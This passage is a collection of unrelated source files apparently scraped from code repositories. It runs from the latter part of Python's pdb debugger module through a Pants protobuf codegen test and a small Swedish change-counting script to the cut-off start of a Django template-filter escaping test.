You can use breakpoint commands to start your program up
again. Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations)
terminates the command list (as if that command was
immediately followed by end). This is because any time you
resume execution (even with a simple next or step), you may
encounter another breakpoint -- which could have its own
command list, leading to ambiguities about which list to
execute.
If you use the 'silent' command in the command list, the usual
message about stopping at a breakpoint is not printed. This
may be desirable for breakpoints that are to print a specific
message and then continue. If none of the other commands
print anything, you will see no sign that the breakpoint was
reached.
"""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber) - 1
else:
try:
bnum = int(arg)
except:
self.error("Usage: commands [bnum]\n ...\n end")
return
self.commands_bnum = bnum
# Save old definitions for the case of a keyboard interrupt.
if bnum in self.commands:
old_command_defs = (self.commands[bnum],
self.commands_doprompt[bnum],
self.commands_silent[bnum])
else:
old_command_defs = None
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
try:
self.cmdloop()
except KeyboardInterrupt:
# Restore old definitions.
if old_command_defs:
self.commands[bnum] = old_command_defs[0]
self.commands_doprompt[bnum] = old_command_defs[1]
self.commands_silent[bnum] = old_command_defs[2]
else:
del self.commands[bnum]
del self.commands_doprompt[bnum]
del self.commands_silent[bnum]
self.error('command definition aborted, old commands restored')
finally:
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
"""b(reak) [ ([filename:]lineno | function) [, condition] ]
Without argument, list all breaks.
With a line number argument, set a break at this line in the
current file. With a function name, set a break at the first
executable line of that function. If a second argument is
present, it is a string specifying an expression which must
evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on
sys.path; the .py suffix may be omitted.
"""
if not arg:
if self.breaks: # There's at least one
self.message("Num Type Disp Enb Where")
for bp in bdb.Breakpoint.bpbynumber:
if bp:
self.message(bp.bpformat())
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
self.error('%r not found from sys.path' % filename)
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError:
self.error('Bad lineno: %s' % arg)
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe_locals)
except:
func = arg
try:
if hasattr(func, '__func__'):
func = func.__func__
code = func.__code__
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
self.error('The specified object %r is not a function '
'or was not found along sys.path.' % arg)
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err:
                self.error(err)
else:
bp = self.get_breaks(filename, line)[-1]
self.message("Breakpoint %d at %s:%d" %
(bp.number, bp.file, bp.line))
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
"""tbreak [ ([filename:]lineno | function) [, condition] ]
Same arguments as break, but sets a temporary breakpoint: it
is automatically deleted when first hit.
"""
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
# this method should be callable before starting debugging, so default
# to "no globals" if there is no current frame
globs = self.curframe.f_globals if hasattr(self, 'curframe') else None
line = linecache.getline(filename, lineno, globs)
if not line:
self.message('End of file')
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
self.error('Blank or comment')
return 0
return lineno
def do_enable(self, arg):
"""enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
breakpoint numbers.
"""
args = arg.split()
for i in args:
try:
bp = self.get_bpbynumber(i)
except ValueError as err:
self.error(err)
else:
bp.enable()
self.message('Enabled %s' % bp)
def do_disable(self, arg):
"""disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
breakpoint numbers. Disabling a breakpoint means it cannot
cause the program to stop execution, but unlike clearing a
breakpoint, it remains in the list of breakpoints and can be
(re-)enabled.
"""
args = arg.split()
for i in args:
try:
bp = self.get_bpbynumber(i)
except ValueError as err:
self.error(err)
else:
bp.disable()
self.message('Disabled %s' % bp)
def do_condition(self, arg):
"""condition bpnumber [condition]
Set a new condition for the breakpoint, an expression which
must evaluate to true before the breakpoint is honored. If
condition is absent, any existing condition is removed; i.e.,
the breakpoint is made unconditional.
"""
args = arg.split(' ', 1)
try:
cond = args[1]
except IndexError:
cond = None
try:
bp = self.get_bpbynumber(args[0].strip())
except ValueError as err:
self.error(err)
else:
bp.cond = cond
if not cond:
self.message('Breakpoint %d is now unconditional.' % bp.number)
else:
self.message('New condition set for breakpoint %d.' % bp.number)
def do_ignore(self, arg):
"""ignore bpnumber [count]
Set the ignore count for the given breakpoint number. If
count is omitted, the ignore count is set to 0. A breakpoint
becomes active when the ignore count is zero. When non-zero,
the count is decremented each time the breakpoint is reached
and the breakpoint is not disabled and any associated
condition evaluates to true.
"""
args = arg.split()
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = self.get_bpbynumber(args[0].strip())
except ValueError as err:
self.error(err)
else:
bp.ignore = count
if count > 0:
if count > 1:
countstr = '%d crossings' % count
else:
countstr = '1 crossing'
self.message('Will ignore next %s of breakpoint %d.' %
(countstr, bp.number))
else:
self.message('Will stop next time breakpoint %d is reached.'
% bp.number)
def do_clear(self, arg):
"""cl(ear) filename:lineno\ncl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
"""
if not arg:
try:
reply = input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
bplist = [bp for bp in bdb.Breakpoint.bpbynumber if bp]
self.clear_all_breaks()
for bp in bplist:
self.message('Deleted %s' % bp)
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
bplist = self.get_breaks(filename, lineno)
err = self.clear_break(filename, lineno)
if err:
self.error(err)
else:
for bp in bplist:
self.message('Deleted %s' % bp)
return
numberlist = arg.split()
for i in numberlist:
try:
bp = self.get_bpbynumber(i)
except ValueError as err:
self.error(err)
else:
self.clear_bpbynumber(i)
self.message('Deleted %s' % bp)
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
"""w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command.
"""
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def _select_frame(self, number):
assert 0 <= number < len(self.stack)
self.curindex = number
self.curframe = self.stack[self.curindex][0]
self.curframe_locals = self.curframe.f_locals
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
def do_up(self, arg):
"""u(p) [count]
Move the current frame count (default one) levels up in the
stack trace (to an older frame).
"""
if self.curindex == 0:
self.error('Oldest frame')
return
try:
count = int(arg or 1)
except ValueError:
self.error('Invalid frame count (%s)' % arg)
return
if count < 0:
newframe = 0
else:
newframe = max(0, self.curindex - count)
self._select_frame(newframe)
do_u = do_up
def do_down(self, arg):
"""d(own) [count]
Move the current frame count (default one) levels down in the
stack trace (to a newer frame).
"""
if self.curindex + 1 == len(self.stack):
self.error('Newest frame')
return
try:
count = int(arg or 1)
except ValueError:
self.error('Invalid frame count (%s)' % arg)
return
if count < 0:
newframe = len(self.stack) - 1
else:
newframe = min(len(self.stack) - 1, self.curindex + count)
self._select_frame(newframe)
do_d = do_down
def do_until(self, arg):
"""unt(il) [lineno]
Without argument, continue execution until the line with a
number greater than the current one is reached. With a line
number, continue execution until a line with a number greater
or equal to that is reached. In both cases, also stop when
the current frame returns.
"""
if arg:
try:
lineno = int(arg)
except ValueError:
self.error('Error in argument: %r' % arg)
return
if lineno <= self.curframe.f_lineno:
self.error('"until" line number is smaller than current '
'line number')
return
else:
lineno = None
self.set_until(self.curframe, lineno)
return 1
do_unt = do_until
def do_step(self, arg):
"""s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current
function).
"""
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
"""n(ext)
Continue execution until the next line in the current function
is reached or it returns.
"""
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""run [args...]
Restart the debugged python program. If a string is supplied
        it is split with "shlex", and the result is used as the new
sys.argv. History, breakpoints, actions and debugger options
are preserved. "restart" is an alias for "run".
"""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
# this is caught in the main debugger loop
raise Restart
do_restart = do_run
def do_return(self, arg):
"""r(eturn)
Continue execution until the current function returns.
"""
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
"""c(ont(inue))
Continue execution, only stop when a breakpoint is encountered.
"""
if not self.nosigint:
self._previous_sigint_handler = \
signal.signal(signal.SIGINT, self.sigint_handler)
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
"""j(ump) lineno
Set the next line that will be executed. Only available in
the bottom-most frame. This lets you jump back and execute
code again, or jump forward to skip code that you don't want
to run.
It should be noted that not all jumps are allowed -- for
instance it is not possible to jump into the middle of a
for loop or out of a finally clause.
"""
if self.curindex + 1 != len(self.stack):
self.error('You can only jump within the bottom frame')
return
try:
arg = int(arg)
except ValueError:
self.error("The 'jump' command requires a line number")
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError as e:
self.error('Jump failed: %s' % e)
do_j = do_jump
def do_debug(self, arg):
"""debug code
Enter a recursive debugger that steps through the code
argument (which is an arbitrary expression or statement to be
executed in the current environment).
"""
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
self.message("ENTERING RECURSIVE DEBUGGER")
sys.call_tracing(p.run, (arg, globals, locals))
self.message("LEAVING RECURSIVE DEBUGGER")
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
"""q(uit)\nexit
Quit from the debugger. The program being executed is aborted.
"""
self._user_requested_quit = True
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
"""EOF
Handles the receipt of EOF as a command.
"""
self.message('')
self._user_requested_quit = True
self.set_quit()
return 1
def do_args(self, arg):
"""a(rgs)
Print the argument list of the current function.
"""
co = self.curframe.f_code
dict = self.curframe_locals
n = co.co_argcount
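        # CO_VARARGS (0x4) and CO_VARKEYWORDS (0x8) each reserve one extra
        # slot in co_varnames for *args / **kwargs, so include them here.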
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
if name in dict:
self.message('%s = %r' % (name, dict[name]))
else:
self.message('%s = *** undefined ***' % (name,))
do_a = do_args
def do_retval(self, arg):
"""retval
Print the return value for the last return of a function.
"""
if '__return__' in self.curframe_locals:
self.message(repr(self.curframe_locals['__return__']))
else:
self.error('Not yet returned!')
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals, self.curframe_locals)
except:
exc_info = sys.exc_info()[:2]
self.error(traceback.format_exception_only(*exc_info)[-1].strip())
raise
def _getval_except(self, arg, frame=None):
try:
if frame is None:
return eval(arg, self.curframe.f_globals, self.curframe_locals)
else:
return eval(arg, frame.f_globals, frame.f_locals)
except:
exc_info = sys.exc_info()[:2]
err = traceback.format_exception_only(*exc_info)[-1].strip()
return _rstr('** raised %s **' % err)
def do_p(self, arg):
"""p(rint) expression
Print the value of the expression.
"""
try:
self.message(repr(self._getval(arg)))
except:
pass
# make "print" an alias of "p" since print isn't a Python statement anymore
do_print = do_p
def do_pp(self, arg):
"""pp expression
Pretty-print the value of the expression.
"""
try:
self.message(pprint.pformat(self._getval(arg)))
except:
pass
def do_list(self, arg):
"""l(ist) [first [,last] | .]
List source code for the current file. Without arguments,
list 11 lines around the current line or continue the previous
listing. With . as argument, list 11 lines around the current
line. With one argument, list 11 lines starting at that line.
With two arguments, list the given range; if the second
argument is less than the first, it is a count.
The current line in the current frame is indicated by "->".
If an exception is being debugged, the line where the
exception was originally raised or propagated is indicated by
">>", if it differs from the current line.
"""
self.lastcmd = 'list'
last = None
if arg and arg != '.':
try:
if ',' in arg:
first, last = arg.split(',')
first = int(first.strip())
last = int(last.strip())
if last < first:
# assume it's a count
last = first + last
else:
first = int(arg.strip())
first = max(1, first - 5)
except ValueError:
self.error('Error in argument: %r' % arg)
return
elif self.lineno is None or arg == '.':
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
lines = linecache.getlines(filename, self.curframe.f_globals)
self._print_lines(lines[first-1:last], first, breaklist,
self.curframe)
self.lineno = min(last, len(lines))
if len(lines) < last:
self.message('[EOF]')
except KeyboardInterrupt:
pass
do_l = do_list
def do_longlist(self, arg):
"""longlist | ll
List the whole source code for the current function or frame.
"""
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
lines, lineno = getsourcelines(self.curframe)
except IOError as err:
self.error(err)
return
self._print_lines(lines, lineno, breaklist, self.curframe)
do_ll = do_longlist
def do_source(self, arg):
"""source expression
Try to get source code for the given object and display it.
"""
try:
obj = self._getval(arg)
except:
return
try:
lines, lineno = getsourcelines(obj)
except (IOError, TypeError) as err:
self.error(err)
return
self._print_lines(lines, lineno)
def _print_lines(self, lines, start, breaks=(), frame=None):
"""Print a range of lines."""
if frame:
current_lineno = frame.f_lineno
exc_lineno = self.tb_lineno.get(frame, -1)
else:
current_lineno = exc_lineno = -1
for lineno, line in enumerate(lines, start):
s = str(lineno).rjust(3)
if len(s) < 4:
s += ' '
if lineno in breaks:
s += 'B'
else:
s += ' '
if lineno == current_lineno:
s += '->'
elif lineno == exc_lineno:
s += '>>'
self.message(s + '\t' + line.rstrip())
def do_whatis(self, arg):
"""whatis arg
Print the type of the argument.
"""
try:
value = self._getval(arg)
except:
# _getval() already printed the error
return
code = None
# Is it a function?
try:
code = value.__code__
except Exception:
pass
if code:
self.message('Function %s' % code.co_name)
return
# Is it an instance method?
try:
code = value.__func__.__code__
except Exception:
pass
if code:
self.message('Method %s' % code.co_name)
return
# Is it a class?
if value.__class__ is type:
self.message('Class %s.%s' % (value.__module__, value.__name__))
return
# None of the above...
self.message(type(value))
def do_display(self, arg):
"""display [expression]
Display the value of the expression if it changed, each time execution
stops in the current frame.
Without expression, list all display expressions for the current frame.
"""
if not arg:
self.message('Currently displaying:')
for item in self.displaying.get(self.curframe, {}).items():
self.message('%s: %r' % item)
else:
val = self._getval_except(arg)
self.displaying.setdefault(self.curframe, {})[arg] = val
self.message('display %s: %r' % (arg, val))
def do_undisplay(self, arg):
"""undisplay [expression]
Do not display the expression any more in the current frame.
Without expression, clear all display expressions for the current frame.
"""
if arg:
try:
del self.displaying.get(self.curframe, {})[arg]
except KeyError:
self.error('not displaying %s' % arg)
else:
self.displaying.pop(self.curframe, None)
def do_interact(self, arg):
"""interact
        Start an interactive interpreter whose global namespace
contains all the (global and local) names found in the current scope.
"""
ns = self.curframe.f_globals.copy()
ns.update(self.curframe_locals)
code.interact("*interactive*", local=ns)
def do_alias(self, arg):
"""alias [name [command [parameter parameter ...] ]]
Create an alias called 'name' that executes 'command'. The
command must *not* be enclosed in quotes. Replaceable
parameters can be indicated by %1, %2, and so on, while %* is
replaced by all the parameters. If no command is given, the
current alias for name is shown. If no name is given, all
aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is
recursively applied to the first word of the command line; all
other words in the line are left alone.
As an example, here are two useful aliases (especially when
placed in the .pdbrc file):
# Print instance variables (usage "pi classInst")
        alias pi for k in %1.__dict__.keys(): print("%1.",k,"=",%1.__dict__[k])
# Print instance variables in self
alias ps pi self
"""
args = arg.split()
if len(args) == 0:
keys = sorted(self.aliases.keys())
for alias in keys:
self.message("%s = %s" % (alias, self.aliases[alias]))
return
if args[0] in self.aliases and len(args) == 1:
self.message("%s = %s" % (args[0], self.aliases[args[0]]))
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
"""unalias name
Delete the specified alias.
"""
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
# List of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
prefix = '> '
else:
prefix = ' '
self.message(prefix +
self.format_stack_entry(frame_lineno, prompt_prefix))
# Provide help
def do_help(self, arg):
"""h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command.
"help pdb" shows the full pdb documentation.
"help exec" gives help on the ! command.
"""
if not arg:
return cmd.Cmd.do_help(self, arg)
try:
try:
topic = getattr(self, 'help_' + arg)
return topic()
except AttributeError:
command = getattr(self, 'do_' + arg)
except AttributeError:
self.error('No help for %r' % arg)
else:
if sys.flags.optimize >= 2:
self.error('No help for %r; please do not run Python with -OO '
'if you need command help' % arg)
return
self.message(command.__doc__.rstrip())
do_h = do_help
def help_exec(self):
"""(!) statement
Execute the (one-line) statement in the context of the current
stack frame. The exclamation point can be omitted unless the
first word of the statement resembles a debugger command. To
assign to a global variable you must always prefix the command
with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)
"""
self.message((self.help_exec.__doc__ or '').strip())
def help_pdb(self):
help()
# other helper functions
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = True
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = False
with open(filename, "rb") as fp:
statement = "exec(compile(%r, %r, 'exec'))" % \
(fp.read(), self.mainpyfile)
self.run(statement)
# Collect all command help into docstring, if not run with -OO
if __doc__ is not None:
# unfortunately we can't guess this order from the class definition
_help_order = [
'help', 'where', 'down', 'up', 'break', 'tbreak', 'clear', 'disable',
'enable', 'ignore', 'condition', 'commands', 'step', 'next', 'until',
'jump', 'return', 'retval', 'run', 'continue', 'list', 'longlist',
'args', 'print', 'pp', 'whatis', 'source', 'display', 'undisplay',
'interact', 'alias', 'unalias', 'debug', 'quit',
]
for _command in _help_order:
__doc__ += getattr(Pdb, 'do_' + _command).__doc__.strip() + '\n\n'
__doc__ += Pdb.help_exec.__doc__
del _help_order, _command
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
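# A minimal usage sketch for set_trace(): drop into the debugger at a
# chosen point in your own code (hypothetical function).
#
#     import pdb
#     def buggy(x):
#         pdb.set_trace()   # pdb stops here, in the caller's frame
#         return x + 1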
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
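# Post-mortem usage sketch: inspect the frame where an exception was
# raised; with no argument, post_mortem() picks up sys.exc_info()[2].
#
#     try:
#         1 / 0
#     except ZeroDivisionError:
#         import pdb
#         pdb.post_mortem()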
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
import pydoc
pydoc.pager(__doc__)
_usage = """\
usage: pdb.py [-c command] ... pyfile [arg] ...
Debug the Python program given by pyfile.
Initial commands are read from .pdbrc files in your home directory
and in the current directory, if they exist. Commands supplied with
-c are executed after commands from .pdbrc files.
To let the script run until an exception occurs, use "-c continue".
To let the script run up to a given line X in the debugged file, use
"-c 'until X'"."""
def main():
import getopt
opts, args = getopt.getopt(sys.argv[1:], 'hc:', ['--help', '--command='])
if not args:
print(_usage)
sys.exit(2)
commands = []
for opt, optarg in opts:
if opt in ['-h', '--help']:
print(_usage)
sys.exit()
elif opt in ['-c', '--command']:
commands.append(optarg)
mainpyfile = args[0] # Get script filename
if not os.path.exists(mainpyfile):
print('Error:', mainpyfile, 'does not exist')
sys.exit(1)
sys.argv[:] = args # Hide "pdb.py" and pdb options from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command
# which allows explicit specification of command line arguments.
pdb = Pdb()
pdb.rcLines.extend(commands)
while True:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print("The program finished and will be restarted")
except Restart:
print("Restarting", mainpyfile, "with arguments:")
print("\t" + " ".join(args))
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print("The program exited via sys.exit(). Exit status:", end=' ')
print(sys.exc_info()[1])
except:
traceback.print_exc()
print("Uncaught exception. Entering post mortem debugging")
print("Running 'cont' or 'step' will restart the program")
t = sys.exc_info()[2]
pdb.interaction(None, t)
print("Post mortem debugger finished. The " + mainpyfile +
" will be restarted")
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
baroquebobcat/pants
|
refs/heads/master
|
tests/python/pants_test/backend/codegen/protobuf/java/test_protobuf_gen.py
|
1
|
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from twitter.common.collections import OrderedSet
from pants.backend.codegen.protobuf.java.protobuf_gen import ProtobufGen
from pants.backend.codegen.protobuf.java.register import build_file_aliases as register_codegen
from pants.backend.jvm.register import build_file_aliases as register_jvm
from pants.build_graph.register import build_file_aliases as register_core
from pants_test.task_test_base import TaskTestBase
class ProtobufGenTest(TaskTestBase):
def setUp(self):
super(ProtobufGenTest, self).setUp()
self.set_options(pants_bootstrapdir='~/.cache/pants',
max_subprocess_args=100,
binaries_fetch_timeout_secs=1,
binaries_baseurls=['http://example.com/dummy_base_url'])
@classmethod
def task_type(cls):
return ProtobufGen
@classmethod
def alias_groups(cls):
return register_core().merge(register_jvm()).merge(register_codegen())
def test_default_javadeps(self):
self.create_file(relpath='test_proto/test.proto', contents=dedent("""
package com.example.test_proto;
enum Foo { foo=1;}
message Bar {}
"""))
self.add_to_build_file('test_proto', dedent("""
java_protobuf_library(name='proto',
sources=['test.proto'],
dependencies=[]
)
"""))
self.add_to_build_file('3rdparty', dedent("""
target(name='protobuf-java')
"""))
context = self.context(target_roots=[self.target('test_proto:proto')])
task = self.create_task(context)
javadeps = task.javadeps
self.assertEquals(len(javadeps), 1)
self.assertEquals('protobuf-java', javadeps.pop().name)
def test_calculate_sources(self):
self.create_file(relpath='proto-lib/foo.proto', contents='')
self.add_to_build_file('proto-lib', dedent("""
java_protobuf_library(name='proto-target',
sources=['foo.proto'],
)
"""))
target = self.target('proto-lib:proto-target')
context = self.context(target_roots=[target])
task = self.create_task(context)
result = task._calculate_sources(target)
self.assertEquals(1, len(result.keys()))
self.assertEquals(OrderedSet(['proto-lib/foo.proto']), result['proto-lib'])
def test_calculate_sources_with_source_root(self):
self.create_file(relpath='project/src/main/proto/proto-lib/foo.proto', contents='')
self.add_to_build_file('project/src/main/proto/proto-lib', dedent("""
java_protobuf_library(name='proto-target',
sources=['foo.proto'],
)
"""))
target = self.target('project/src/main/proto/proto-lib:proto-target')
context = self.context(target_roots=[target])
task = self.create_task(context)
result = task._calculate_sources(target)
self.assertEquals(1, len(result.keys()))
self.assertEquals(OrderedSet(['project/src/main/proto/proto-lib/foo.proto']),
result['project/src/main/proto'])
|
Kolguyev/samples
|
refs/heads/master
|
vaxel_beraknare/VaxelRaknare_v2.py
|
1
|
class ValorRaknare(object):
    ''' Computes the count of a given denomination,
    given an amount.
    '''
def __init__(self, valor):
self.valor = valor
def AntalOchAterstaende(self, belopp):
        ''' Counts how many of one denomination fit '''
aterstaende = belopp%self.valor
antal = belopp/self.valor
return antal, aterstaende
class VaxelRaknare(object):
    ''' Computes the count of each denomination, given
    an amount.
    '''
def __init__(self, valorer):
self.valorer = valorer
def ValorAntal(self, aterstaende):
        ''' Counts how many of each denomination fit and saves
        the result as a dictionary.
        '''
valorAntal = dict()
for valor in self.valorer:
antal, aterstaende = ValorRaknare(valor).AntalOchAterstaende(aterstaende)
if not antal:
continue
valorAntal[valor] = antal
return valorAntal, aterstaende
def VisaAntal(self, belopp):
valorAntal, aterstaende = self.ValorAntal(belopp)
        print 'The amount %.1f has the following denominations:' % belopp
for valor in self.valorer:
antal = valorAntal.get(valor)
if not antal:
continue
print '{0:10}{1:10}'.format(str(valor), str(antal) + " st")
        print '(Remaining amount: %.1f)' % aterstaende
vaxelRaknareSEK = VaxelRaknare([1000, 500, 100, 50, 20, 10, 5, 1])
vaxelRaknareSEK.VisaAntal(1997)
vaxelRaknareSEK.VisaAntal(43)
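# Expected breakdown for 1997 (a sketch, assuming whole-number division):
# one 1000, one 500, four 100s, one 50, two 20s, one 5 and two 1s, with
# a remaining amount of 0.0; for 43 it is two 20s and three 1s.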
|
intgr/django
|
refs/heads/master
|
tests/template_tests/filter_tests/test_unordered_list.py
|
7
|
from django.template.defaultfilters import unordered_list
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class UnorderedListTests(SimpleTestCase):
@setup({'unordered_list01': '{{ a|unordered_list }}'})
def test_unordered_list01(self):
output = self.engine.render_to_string('unordered_list01', {'a': ['x>', ['<y']]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list02': '{% autoescape off %}{{ a|unordered_list }}{% endautoescape %}'})
def test_unordered_list02(self):
output = self.engine.render_to_string('unordered_list02', {'a': ['x>', ['<y']]})
self.assertEqual(output, '\t<li>x>\n\t<ul>\n\t\t<li><y</li>\n\t</ul>\n\t</li>')
@setup({'unordered_list03': '{{ a|unordered_list }}'})
def test_unordered_list03(self):
output = self.engine.render_to_string('unordered_list03', {'a': ['x>', [mark_safe('<y')]]})
